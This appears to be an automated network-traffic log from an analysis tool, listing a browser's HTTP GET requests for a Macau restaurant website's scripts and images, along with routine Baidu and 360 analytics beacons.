Source: global trafficHTTP traffic detected: GET /m/static/js/jquery.min.js HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /m/static/js/jquery-1.11.3.min.js HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /m/static/js/jquery.js HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /m/static/js/index.js HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/logo.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/topbanner.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/logo_rightPic.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu_leftPic.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu_rightPic.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu_bg.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu03.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu02.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbt HTTP/1.1Host: s.360.cnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/indexpic06.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu05.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu04.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1Host: api.share.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/menu01b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/indexpic04.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/indexpic01.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/copyrightbg.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/main.cssAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu06.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/indexpic02.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /push.js HTTP/1.1Host: push.zhanzhang.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbt HTTP/1.1Host: s.360.cnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/indexpic03.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1Host: api.share.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1Host: api.share.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1Host: api.share.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/menu_leftPic.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/logo.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu_rightPic.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu_bg.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu03.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/logo_rightPic.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/topbanner.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu02.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu05.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu04.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu01b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/copyrightbg.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/menu06.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /images/indexpic04.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/indexpic03.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/indexpic02.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/indexpic01.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu02b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu03b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu05b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu04b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu06b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/indexpic06.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu04b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
